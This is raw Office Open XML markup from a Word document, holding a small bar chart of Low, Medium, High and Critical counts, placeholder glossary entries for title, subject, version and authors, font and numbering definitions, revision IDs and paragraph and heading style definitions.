              <c:f>Sheet1!$A$2:$A$5</c:f>
              <c:strCache>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>Low</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Medium</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>High</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Critical</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$2:$B$5</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>7</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000006-7F70-4907-9834-3675AA65C872}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="219"/>
        <c:overlap val="-27"/>
        <c:axId val="925827199"/>
        <c:axId val="585465040"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="925827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465040"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="585465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5827199"/>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D4D843C-B4DE-49AD-8FD8-7E08862A7A11}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="0057379E" w:rsidRDefault="0057379E">
          <w:r w:rsidRPr="00FE78BD">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="1F233A74982143148B2C64043263D812"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{73CDAC47-EB15-4834-B5E1-70B1173ECF96}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="0057379E" w:rsidRDefault="0057379E" w:rsidP="0057379E">
          <w:pPr>
            <w:pStyle w:val="1F233A74982143148B2C64043263D812"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Type the version of the document here.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="854C1BAE7E1742468BAA4E175BEA7C61"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{D481729E-30D0-4660-B052-6DF2E0FE6BFD}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="0057379E" w:rsidRDefault="0057379E" w:rsidP="0057379E">
          <w:pPr>
            <w:pStyle w:val="854C1BAE7E1742468BAA4E175BEA7C61"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Type the authors of the document here.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="0F733057730447D596BBFDBF11EF7A0F"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{98AAE3C4-144E-4977-ACBF-A6C120035382}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00831819" w:rsidRDefault="00831819" w:rsidP="00831819">
          <w:pPr>
            <w:pStyle w:val="0F733057730447D596BBFDBF11EF7A0F"/>
          </w:pPr>
          <w:r w:rsidRPr="00FE78BD">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="B78E9CB8205742F38AF546E215FFD504"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{9423BBA7-4748-487E-A325-D730E89E5DB4}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="009502B9" w:rsidRDefault="009502B9" w:rsidP="009502B9">
          <w:pPr>
            <w:pStyle w:val="B78E9CB8205742F38AF546E215FFD504"/>
          </w:pPr>
          <w:r w:rsidRPr="00FE78BD">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="8BD33337FF6E458FBD567FF1325DC82F"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{D4214AF9-B2B7-4740-A72B-082E50DCBCFA}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="007500C6" w:rsidRDefault="007500C6" w:rsidP="007500C6">
          <w:pPr>
            <w:pStyle w:val="8BD33337FF6E458FBD567FF1325DC82F"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>[DG]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="BB56302F18754C8AA7690E71CD1C4D90"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{EBD07E3F-6B33-45E0-BC11-B0018654090B}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00396609" w:rsidRDefault="00396609">
          <w:pPr>
            <w:pStyle w:val="BB56302F18754C8AA7690E71CD1C4D90"/>
          </w:pPr>
          <w:r w:rsidRPr="003C0891">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>[Subject]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="6C66DCDBE8054EEDB04FA56C3BD57AE0"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{62A90D58-E704-45FE-95C9-B6DFA805778F}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00396609" w:rsidRDefault="00396609">
          <w:r w:rsidRPr="003C0891">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>[Title]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="840203C9FF1F4043A3483346FA2871B0"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{8200A24A-0110-45EA-B598-28D105DD704D}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00396609" w:rsidRDefault="00396609">
          <w:pPr>
            <w:pStyle w:val="840203C9FF1F4043A3483346FA2871B0"/>
          </w:pPr>
          <w:r w:rsidRPr="003C0891">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>[Title]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="DE072181A0894D9B8A95B6EAD01EDF83"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{83E716C7-4516-44A4-8931-D194FEE63976}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00396609" w:rsidRDefault="00396609">
          <w:pPr>
            <w:pStyle w:val="DE072181A0894D9B8A95B6EAD01EDF83"/>
          </w:pPr>
          <w:r w:rsidRPr="003C0891">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>[Subject]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="746D911518154AEC8B1C27992CFA98B0"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{F59D1E6E-1501-47AF-B007-739D4522A696}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00396609" w:rsidRDefault="00396609">
          <w:pPr>
            <w:pStyle w:val="746D911518154AEC8B1C27992CFA98B0"/>
          </w:pPr>
          <w:r w:rsidRPr="003C0891">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>[Title]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="3A023E704D8E4DD79D71542E755B3DE1"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{5FBF94C9-B8D5-45CF-AEA7-0AD035F2627F}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00396609" w:rsidRDefault="00396609">
          <w:pPr>
            <w:pStyle w:val="3A023E704D8E4DD79D71542E755B3DE1"/>
          </w:pPr>
          <w:r w:rsidRPr="003C0891">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>[Subject]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="B33DE9DFB7F543D8B244F6B2BD1AAD37"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{6897EE46-58AA-4AA2-9443-30133381B383}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00396609" w:rsidRDefault="00396609">
          <w:pPr>
            <w:pStyle w:val="B33DE9DFB7F543D8B244F6B2BD1AAD37"/>
          </w:pPr>
          <w:r w:rsidRPr="003C0891">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>[Title]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="1EFB02F20A3F4605ADB69E0325D6D5F2"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{0EA97B8D-A737-4F72-82C1-B00C79B23FAF}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00396609" w:rsidRDefault="00396609">
          <w:pPr>
            <w:pStyle w:val="1EFB02F20A3F4605ADB69E0325D6D5F2"/>
          </w:pPr>
          <w:r w:rsidRPr="003C0891">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>[Subject]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="6187112204064D41BF775EAB15DA5799"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{1F127DF9-410F-46AC-B3C7-849633F0B0E4}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00770C67" w:rsidRDefault="00770C67" w:rsidP="00770C67">
          <w:pPr>
            <w:pStyle w:val="6187112204064D41BF775EAB15DA5799"/>
          </w:pPr>
          <w:r w:rsidRPr="003C0891">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>[Title]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="7FDA3514B9D043F28F9E5ABD9B245C90"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{C18AA35F-B70C-4755-BA04-7E9EE998A1E4}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00770C67" w:rsidRDefault="00770C67" w:rsidP="00770C67">
          <w:pPr>
            <w:pStyle w:val="7FDA3514B9D043F28F9E5ABD9B245C90"/>
          </w:pPr>
          <w:r w:rsidRPr="003C0891">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>[Subject]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="3FBE7E18E9C64B3D8D6586CE3A6E6447"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{2F2FEC4D-3183-4A16-89CA-4308A63DF0FD}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00770C67" w:rsidRDefault="00770C67" w:rsidP="00770C67">
          <w:pPr>
            <w:pStyle w:val="3FBE7E18E9C64B3D8D6586CE3A6E6447"/>
          </w:pPr>
          <w:r w:rsidRPr="003C0891">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>[Title]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="3A94583CAF5141B3A842DC56EC8FC38D"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{C2A35C47-458B-421D-8DCD-D85AE987DF3E}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00770C67" w:rsidRDefault="00770C67" w:rsidP="00770C67">
          <w:pPr>
            <w:pStyle w:val="3A94583CAF5141B3A842DC56EC8FC38D"/>
          </w:pPr>
          <w:r w:rsidRPr="003C089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hnschrift SemiCondensed">
    <w:panose1 w:val="020B0502040204020203"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A00002C7" w:usb1="00000002" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>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23FD1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FEAA5E9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362367806">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1393503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1300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4069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98336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51069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9894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3036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0428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4861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4958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6613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5705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67316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25089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2977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0349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1186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5113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0795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3728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8876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9575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379E"/>
    <w:rsid w:val="000008A2"/>
    <w:rsid w:val="00004A28"/>
    <w:rsid w:val="00014575"/>
    <w:rsid w:val="0001757B"/>
    <w:rsid w:val="00036961"/>
    <w:rsid w:val="0006636A"/>
    <w:rsid w:val="00087AB0"/>
    <w:rsid w:val="000A610A"/>
    <w:rsid w:val="000C2753"/>
    <w:rsid w:val="00103B9B"/>
    <w:rsid w:val="0012203B"/>
    <w:rsid w:val="00130DAA"/>
    <w:rsid w:val="00131D17"/>
    <w:rsid w:val="00132CA9"/>
    <w:rsid w:val="00164E2B"/>
    <w:rsid w:val="0017591F"/>
    <w:rsid w:val="00187995"/>
    <w:rsid w:val="001910E2"/>
    <w:rsid w:val="00196522"/>
    <w:rsid w:val="001B2C61"/>
    <w:rsid w:val="001D69D5"/>
    <w:rsid w:val="00261E24"/>
    <w:rsid w:val="00287660"/>
    <w:rsid w:val="00287EAB"/>
    <w:rsid w:val="00294C1F"/>
    <w:rsid w:val="002D0969"/>
    <w:rsid w:val="002D4383"/>
    <w:rsid w:val="002E5D4A"/>
    <w:rsid w:val="002E6F39"/>
    <w:rsid w:val="002F015F"/>
    <w:rsid w:val="002F544B"/>
    <w:rsid w:val="00303BAE"/>
    <w:rsid w:val="003442F3"/>
    <w:rsid w:val="00351DF6"/>
    <w:rsid w:val="0038023E"/>
    <w:rsid w:val="00385BE4"/>
    <w:rsid w:val="00396154"/>
    <w:rsid w:val="00396609"/>
    <w:rsid w:val="004867F7"/>
    <w:rsid w:val="004C3558"/>
    <w:rsid w:val="00500BFA"/>
    <w:rsid w:val="005054E7"/>
    <w:rsid w:val="00514B44"/>
    <w:rsid w:val="00530B45"/>
    <w:rsid w:val="0057379E"/>
    <w:rsid w:val="00583886"/>
    <w:rsid w:val="005921BA"/>
    <w:rsid w:val="005A4F78"/>
    <w:rsid w:val="005C4F03"/>
    <w:rsid w:val="005E25E8"/>
    <w:rsid w:val="0062423D"/>
    <w:rsid w:val="0063750E"/>
    <w:rsid w:val="006406B0"/>
    <w:rsid w:val="00662BC1"/>
    <w:rsid w:val="00674C3D"/>
    <w:rsid w:val="006959A4"/>
    <w:rsid w:val="006D0D86"/>
    <w:rsid w:val="00701500"/>
    <w:rsid w:val="00712F7F"/>
    <w:rsid w:val="007240C9"/>
    <w:rsid w:val="00737672"/>
    <w:rsid w:val="0074164E"/>
    <w:rsid w:val="00746282"/>
    <w:rsid w:val="007500C6"/>
    <w:rsid w:val="00752F27"/>
    <w:rsid w:val="00770C67"/>
    <w:rsid w:val="00771155"/>
    <w:rsid w:val="00777627"/>
    <w:rsid w:val="00783CF1"/>
    <w:rsid w:val="00790A03"/>
    <w:rsid w:val="00792B61"/>
    <w:rsid w:val="007A3367"/>
    <w:rsid w:val="007D4CBE"/>
    <w:rsid w:val="00805E02"/>
    <w:rsid w:val="00814EFC"/>
    <w:rsid w:val="008173EC"/>
    <w:rsid w:val="0082097D"/>
    <w:rsid w:val="00831819"/>
    <w:rsid w:val="00844BEF"/>
    <w:rsid w:val="008B1400"/>
    <w:rsid w:val="008C11BE"/>
    <w:rsid w:val="008D3045"/>
    <w:rsid w:val="008F0657"/>
    <w:rsid w:val="008F27C6"/>
    <w:rsid w:val="009047A6"/>
    <w:rsid w:val="00911672"/>
    <w:rsid w:val="00941052"/>
    <w:rsid w:val="009502B9"/>
    <w:rsid w:val="009610C7"/>
    <w:rsid w:val="009745B1"/>
    <w:rsid w:val="00A043FA"/>
    <w:rsid w:val="00A4437F"/>
    <w:rsid w:val="00A602AD"/>
    <w:rsid w:val="00A72130"/>
    <w:rsid w:val="00A8148C"/>
    <w:rsid w:val="00A90BD2"/>
    <w:rsid w:val="00AB1296"/>
    <w:rsid w:val="00AB21FE"/>
    <w:rsid w:val="00B04B93"/>
    <w:rsid w:val="00B25720"/>
    <w:rsid w:val="00B32252"/>
    <w:rsid w:val="00B50DB2"/>
    <w:rsid w:val="00B57A91"/>
    <w:rsid w:val="00B6428A"/>
    <w:rsid w:val="00B67B17"/>
    <w:rsid w:val="00B8069E"/>
    <w:rsid w:val="00BB4374"/>
    <w:rsid w:val="00BC15C2"/>
    <w:rsid w:val="00C56DB7"/>
    <w:rsid w:val="00C62088"/>
    <w:rsid w:val="00C65E62"/>
    <w:rsid w:val="00C7277C"/>
    <w:rsid w:val="00CF7372"/>
    <w:rsid w:val="00D355C5"/>
    <w:rsid w:val="00DD0119"/>
    <w:rsid w:val="00DE53F5"/>
    <w:rsid w:val="00E1794E"/>
    <w:rsid w:val="00E542D5"/>
    <w:rsid w:val="00EB67F3"/>
    <w:rsid w:val="00ED61F0"/>
    <w:rsid w:val="00EE54CF"/>
    <w:rsid w:val="00EF38D7"/>
    <w:rsid w:val="00F06999"/>
    <w:rsid w:val="00F12636"/>
    <w:rsid w:val="00F31424"/>
    <w:rsid w:val="00F8781C"/>
    <w:rsid w:val="00F94309"/>
    <w:rsid w:val="00FB5558"/>
    <w:rsid w:val="00FB75C4"/>
    <w:rsid w:val="00FD4EE0"/>
    <w:rsid w:val="00FE2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GB" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault/>
  </w:docDefaults>
  <w:latentStyles w:defLockedState="1" w:defUIPriority="0" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="376">
    <w:lsdException w:name="Normal" w:uiPriority="1" w:qFormat="1"/>
    <w:lsdException w:name="heading 1" w:qFormat="1"/>
    <w:lsdException w:name="heading 2" w:qFormat="1"/>
    <w:lsdException w:name="heading 3" w:qFormat="1"/>
    <w:lsdException w:name="heading 4"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unhideWhenUsed="1"/>
    <w:lsdException w:name="annotation text"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unhideWhenUsed="1"/>
    <w:lsdException w:name="table of authorities" w:semiHidden="1"/>
    <w:lsdException w:name="macro" w:semiHidden="1"/>
    <w:lsdException w:name="toa heading" w:semiHidden="1"/>
    <w:lsdException w:name="List"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qFormat="1"/>
    <w:lsdException w:name="Quote" w:semiHidden="1" w:qFormat="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qFormat="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qFormat="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pPr>
      <w:spacing w:after="120" w:line="264" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:numId w:val="16"/>
      </w:numPr>
      <w:spacing w:before="480"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:smallCaps/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="16"/>
      </w:numPr>
      <w:spacing w:before="420"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="16"/>
      </w:numPr>
      <w:spacing w:before="360"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="16"/>
      </w:numPr>
      <w:spacing w:before="360"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="16"/>
      </w:numPr>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="16"/>
      </w:numPr>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="16"/>
      </w:numPr>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="16"/>
      </w:numPr>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="16"/>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233A74982143148B2C64043263D812">
    <w:name w:val="1F233A74982143148B2C64043263D812"/>
    <w:rsid w:val="0057379E"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="854C1BAE7E1742468BAA4E175BEA7C61">
    <w:name w:val="854C1BAE7E1742468BAA4E175BEA7C61"/>
    <w:rsid w:val="0057379E"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Text2">
    <w:name w:val="Text 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Text2Char"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Text3">
    <w:name w:val="Text 3"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Text3Char"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Text4">
    <w:name w:val="Text 4"/>
